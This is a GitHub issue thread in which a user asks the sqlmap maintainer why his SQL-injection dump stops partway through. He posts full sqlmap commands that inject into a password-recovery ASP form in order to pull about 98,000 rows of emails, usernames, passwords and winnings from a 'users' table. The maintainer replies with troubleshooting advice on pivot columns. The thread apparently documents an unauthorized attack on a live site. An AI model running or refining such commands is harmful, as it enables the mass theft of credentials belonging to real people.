### ISSUE TITLE
The load is stopped

### ISSUE THREAD

**Issue by t00rhack3r** [sqlmapproject/sqlmap#2483]
## What's the problem (or question)?

I am using sqlmap to download data.

Are 98000 records

`python sqlmap.py --threads=10 --random-agent -u http://www.url.com/db/recordar_pass.asp --data="user=-'1" --tamper=space2mssqlblank -D DBNAME -T users -C "deposits,email,id,username,username,password,winnings" --start=1 --stop=98324 --code=500 --time-sec=10 --timeout=100`

Download less than 4000 rows, And then the load stops

It can be fixed?

**Comment by stamparm** [comment]
1) Try for starter to not define column names. sqlmap needs one column that will be UNIQUE.
or
2) Try to use `--pivot-column` (e.g. `--pivot-column=id`) with column name that has majority of different values

**Comment by t00rhack3r** [comment]
Hello

Now i have a problem

Every 200 lines are repeated again

Why do I get this error?

`python sqlmap.py --random-agent -u http://url/db/recordar_pass.asp --data="user=-'1" --tamper=space2mssqlblank -D DB -T users -C "deposits,email,id,username,password,winnings" --code=500 --time-sec=10 --timeout=100 --level=1 --risk=1  -o --hex --dump --pivot-column=id`

**Comment by t00rhack3r** [comment]
Hi, I have this error:
[13:36:37] [WARNING] console output will be trimmed to last 256 rows due to large table size
After the 256 lines do not download more
